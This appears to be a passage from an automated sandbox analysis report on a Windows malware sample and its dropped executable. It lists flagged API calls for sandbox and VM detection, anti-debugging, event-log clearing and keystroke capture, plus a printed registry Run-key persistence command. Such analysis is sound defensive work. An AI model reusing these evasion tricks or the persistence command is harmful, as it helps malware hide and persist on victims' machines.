                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10027C20 IsWindow,GetWindowThreadProcessId,GetCurrentProcessId,GetWindowTextA,IsWindowVisible,lstrlen,LocalAlloc,LocalSize,GetClassNameA,lstrlen,IsWindowEnabled,IsWindowVisible,IsIconic,IsZoomed,lstrcpy,LocalReAlloc,6_2_10027C20
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10019A61 OpenEventLogW,ClearEventLogW,CloseEventLog,6_2_10019A61
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332A358 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0332A358
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: 33MwVPy.exe, 00000006.00000002.3881921714.00000000008B4000.00000020.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000007.00000002.3353141331.00000000008B4000.00000020.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000008.00000002.3435674875.00000000008B4000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: SBIEDLL.DLL
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeRDTSC instruction interceptor: First address: BC92C8 second address: BC92CF instructions: 0x00000000 rdtsc 0x00000002 xor cl, FFFFFF9Ah 0x00000005 mov eax, ebp 0x00000007 rdtsc
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeRDTSC instruction interceptor: First address: BF0B47 second address: 102AF4A instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 movzx eax, di 0x00000006 pop eax 0x00000007 cwd 0x00000009 jmp 00007FC854CBC047h 0x0000000e pop esi 0x0000000f movzx edx, cx 0x00000012 jmp 00007FC854A6A288h 0x00000017 pop ebx 0x00000018 xchg dh, dl 0x0000001a movsx edx, di 0x0000001d pop edx 0x0000001e jmp 00007FC854B1343Ah 0x00000023 ret 0x00000024 popfd 0x00000025 rdtsc
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeRDTSC instruction interceptor: First address: 9BEAAF second address: 9BEAB3 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 pop edi 0x00000004 rdtsc
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeRDTSC instruction interceptor: First address: 9BEAB3 second address: 8F4D48 instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 3E4A5909h 0x00000007 pop ebp 0x00000008 xchg bh, bl 0x0000000a jmp 00007FC854AB810Ah 0x0000000f pop ebx 0x00000010 rdtsc
                Tries to evade analysis by execution special instruction (VM detection)
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSpecial instruction interceptor: First address: 102AF4A instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeDropped PE file which has not been started: C:\Program Files (x86)\90m3FHO\MSVCP140.dllJump to dropped file
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeDropped PE file which has not been started: C:\Program Files (x86)\90m3FHO\VCRUNTIME140.dllJump to dropped file
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-41880
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeAPI coverage: 6.8 %
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeAPI coverage: 2.0 %
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeAPI coverage: 1.0 %
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exe TID: 4568Thread sleep time: -93000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exe TID: 3332Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exe TID: 3332Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C29270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C292771h6_2_6C29270F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C29270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C292771h7_2_6C29270F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331E374 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,6_2_0331E374
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331A3C4 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,6_2_0331A3C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315134 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,6_2_03315134
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331E194 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,6_2_0331E194
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033150BD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,6_2_033150BD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033150DA lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,6_2_033150DA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03316754 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,6_2_03316754
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033164F4 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,6_2_033164F4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033254C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_033254C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03347AFC FindFirstFileExW,6_2_03347AFC
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315AD4 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,6_2_03315AD4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315E14 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,6_2_03315E14
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03314EB3 FindFirstFileA,FindClose,FindClose,6_2_03314EB3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315CE4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,6_2_03315CE4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100230CD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,6_2_100230CD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023110 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,6_2_10023110
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1002C170 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,6_2_1002C170
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1002C350 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,6_2_1002C350
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100283A0 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,6_2_100283A0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100334A0 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_100334A0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100244D0 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,6_2_100244D0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10024730 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,6_2_10024730
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023AB0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,6_2_10023AB0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10055AD8 FindFirstFileExW,6_2_10055AD8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023CC0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,6_2_10023CC0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023DF0 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,6_2_10023DF0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03319404 GetLogicalDriveStringsA,QueryDosDeviceA,lstrlen,lstrcpy,lstrcpy,lstrcat,6_2_03319404
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000906000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z+
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3882524922.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000906000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeAPI call chain: ExitProcess graph end nodegraph_0-42328
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeAPI call chain: ExitProcess graph end nodegraph_0-41648
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeAPI call chain: ExitProcess graph end nodegraph_6-144775
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeAPI call chain: ExitProcess graph end nodegraph_6-144217
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeAPI call chain: ExitProcess graph end node
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Found API chain indicative of debugger detection
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-41905
                Hides threads from debuggers
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeSystem information queried: KernelDebuggerInformationJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F2051 GetNativeSystemInfo,VirtualAlloc,LoadLibraryA,LdrGetProcedureAddress,Sleep,6_2_032F2051
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03318334 EnumDisplaySettingsA,SystemParametersInfoA,PostMessageA,SystemParametersInfoA,PostMessageA,BlockInput,6_2_03318334
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_006388F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006388F0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0330BF74 GetProcessHeap,RtlAllocateHeap,VirtualAlloc,VirtualAlloc,VirtualFree,VirtualProtect,GetLastError,FormatMessageW,LocalAlloc,OutputDebugStringA,6_2_0330BF74
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_006554E8 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006554E8
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026D0B11 mov eax, dword ptr fs:[00000030h]0_2_026D0B11
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03345211 mov eax, dword ptr fs:[00000030h]6_2_03345211
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F2B31 mov eax, dword ptr fs:[00000030h]6_2_032F2B31
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0333D89E mov eax, dword ptr fs:[00000030h]6_2_0333D89E
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100531ED mov eax, dword ptr fs:[00000030h]6_2_100531ED
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1004B87A mov eax, dword ptr fs:[00000030h]6_2_1004B87A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C312D37 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_6C312D37
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_0040EB30 SetUnhandledExceptionFilter,GetClassInfoW,InitCommonControlsEx,GdiplusStartup,0_2_0040EB30
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_006388F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006388F0
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00646E4E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00646E4E
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026DDC2A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_026DDC2A
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026DAD45 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_026DAD45
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_1000DC26 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000DC26
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_1000AD41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000AD41
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C2F1F6A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C2F6D68
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C2F1F75
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0333332D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0333332D
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332B9B3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0332B9B3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332B98B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0332B98B
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332AC46 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0332AC46
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10041309 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_10041309
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003998F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1003998F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10038C22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10038C22
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C2F6D68
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C2F1F6A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C2F1F75
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331856C keybd_event,6_2_0331856C
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess created: C:\Program Files (x86)\90m3FHO\33MwVPy.exe "C:\Program Files (x86)\90m3FHO\33MwVPy.exe" Jump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331AA54 Sleep,CreateMutexA,GetLastError,CloseHandle,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateFileMappingA,Sleep,GetForegroundWindow,GetWindowTextA,lstrlen,GetLocalTime,wsprintfA,GetAsyncKeyState,lstrcat,Sleep,ReleaseMutex,6_2_0331AA54
                Source: Rudvfa0Z17.exe, 00000000.00000002.3261219917.0000000010018000.00000002.00001000.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Pragma: no-cacheGET&AAAAAAAAAAAA$libcef.dll:\v4.0.30319%s%s\%slib%s%slalala123%text/0SafeMonClassSHELL_TrayWndShell_TrayWnd2.lnkreg.exeadd "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v demo /t REG_SZ /d ""file:///BkShadowWndClass1511617181920212223242526272829303132333435363738404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118120121122123124126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160invalid string positionstring too long
                Source: Rudvfa0Z17.exe, Rudvfa0Z17.exe, 00000000.00000002.3261219917.0000000010018000.00000002.00001000.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, 33MwVPy.exe, 33MwVPy.exe, 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: Rudvfa0Z17.exe, Rudvfa0Z17.exe, 00000000.00000002.3261219917.0000000010018000.00000002.00001000.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SHELL_TrayWnd
                Source: 33MwVPy.exe, 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: -no-remote -profile iexplore.exeTaskbarGlomLevelSoftware\Microsoft\Windows\CurrentVersion\Explorer\Advancedexplorer.exeShell_TrayWnd\rundll32.exe shell32.dll,#61\Microsoft\Edge\msedge.exe\360Chrome\Chrome\secoresdk\\360se6\Application\360se.exe360se6\\Application\360se.exe#32768ntdll.dllRtlCompressBufferRtlGetCompressionWorkSpaceSize%08lX%04lX%lu
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100397E8 cpuid 6_2_100397E8
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00658080
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: ____lc_handle_func,GetLocaleInfoW,0_2_0066F472
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0065856F
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00658508
